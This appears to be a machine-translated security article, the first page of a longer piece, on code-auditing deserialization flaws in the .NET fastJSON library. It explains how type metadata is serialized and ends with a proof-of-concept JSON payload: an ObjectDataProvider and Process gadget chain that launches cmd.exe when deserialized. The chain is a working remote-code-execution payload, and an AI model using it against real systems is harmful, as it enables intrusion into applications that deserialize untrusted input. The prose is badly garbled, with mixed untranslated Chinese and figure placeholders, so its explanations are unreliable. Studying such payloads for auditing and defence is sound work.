. NET advanced code audit(third class)Fastjson deserialization vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201993129
Type myhack58
Reporter 佚名
Modified 2019-03-13T00:00:00


In Java Fastjson ever broke the plurality of deserialization vulnerabilities and Bypass version, and in. Net field also has a Fastjson library 作者官宣这是一个读写Json效率最高的的.Net components, using the built-in method JSON. ToJSON can be quickly serialized. Net objects. Let you easily achieve. Net of all type(object,primitive data types, etc.) and Json to convert between that fastjson is an open-source Json. Net library, download address http://www.codeproject.com/Articles/159450/fastJSON, the reverse sequence during the detailed performance comparison is as follows ! 从图上得出和老牌Json.Net, Stack etc up the speed and performance advantage is very obvious, the reason for component authors use reflection to generate a lot of IL code, the IL code is managed code, can be directly to the runtime compilation so the performance in this regard is greatly improved. But in some scenarios developers use JSON. The toobject method of the sequence of the insecurity of the data time will cause the deserialization vulnerability enabling remote RCE attack, the article author from the principles and the code of audit perspective to do the relevant description and reproduction. !

0X01 Fastjson serialize Use JSON. ToJSON can be very easy to achieve. NET objects and Json data conversion, ToJSON will first get the name of the object where the program sets the fully qualified name, and as$types this key value, then the object members of the Attribute name converted to Json data in the Key, put the object members of the attribute values into Json data in the value, following by an example to illustrate the problem, first define the TestClass object ! Defines three members, and implements a static method ClassMethod start the process. Serialization by creating an object instance, respectively, to assign values to members ! The author in order to try to ensure that the Serialization process does not throw an exception, so the introduction of the JSON. The ToJSON method of the second parameter and instantiated to create JSONParameters, the IT field has a lot of type is a Boolean value, ! And deserialization vulnerability related field is UseExtensions, it will be set to true to obtain the class full qualified name, if you do not need to serialize null value when another field SerializeNullValues is set to false; I use JSON. ToJSON obtained after serialization of Json data {"$types":{"WpfApp1. TestClass, WpfApp1, Version=, Culture=neutral, PublicKeyToken=null":"1"},"$type":"1","Classname":"360","Name":"Ivan1ee","Age":18}

0x02 Fastjson deserialization 2.1, deserialization usage The reverse sequence of the process is to will Json data convert to object, Fastjson by creating a new object called JSON. The toobject method to achieve, the toobject there are multiple overloaded methods, when passed two parameters, the first parameter needs to be serialized data, the second parameter set sequence of configuration option to specify JSONParameters in accordance with the specified attribute value processing, the overloaded method with reference to the following figure ! Specific code can refer to the following Demo ! 2.2, to build the Poc Vulnerability trigger point also is that the serialized Json in the$types whether may be controlled, for official document also labels the warning. ! The author continues to select the ObjectDataProvider class to easily call any referenced methods in the class, specifically related to such usage can look at the. NET advanced code audit(the first lesson) XmlSerializer deserialization vulnerability of, because of the Process. The Start method start a thread you need to configure the ProcessStartInfo class-related attributes, such as the specified file name, specify the startup parameters, so first have to consider the sequence of the ProcessStartInfo, the following code Demo ! A step by step point of view, starting from the GetType to get the current instance of the class, the return Type of the type variable t3; and then by Type. The GetProperty method to find the specified FileName public property and assign the value to get PropertyInfo variable of type propertyName; and then use the get PropertyInfo. The SetValue method sets the object value of the specified property“cmd.exe“and similarly for the Arguments attribute specifies the value. The next step then to serialize the Process class, and call the StartInfo to start the program, the Demo is as follows ! Then need to do subtraction, to remove the Independent System. RuntimeType, System. IntPtr data, and ultimately get the deserialized Payload {""$types"":{""System. Windows. Data. ObjectDataProvider, Contains, Version=, Culture=neutral, PublicKeyToken=31bf3856ad364e35"":""1"",""System. Diagnostics. Process, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089"":""3"",""System. Diagnostics. ProcessStartInfo, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089"":""5""},""$type"":""1"",""ObjectInstance"":{""$type"":""3"",""StartInfo"":{""$type"":""5"",""Verb"":"""",""Arguments"":""/c calc.exe"",""CreateNoWindow"":false,""RedirectStandardInput"":false, ""RedirectStandardOutput"":false,""RedirectStandardError"":false,""UseShellExecute"":true,""UserName"":"""",""Domain"":"""",""LoadUserProfile"":false,""FileName"":""cmd.exe"",""WorkingDirectory"":"""",""ErrorDialog"":false,""WindowStyle"":""Normal""},""EnableRaisingEvents"":false},""MethodName"":""Start"", ""IsAsynchronous"":false,""IsInitialLoadEnabled"":true}

[1] [2] next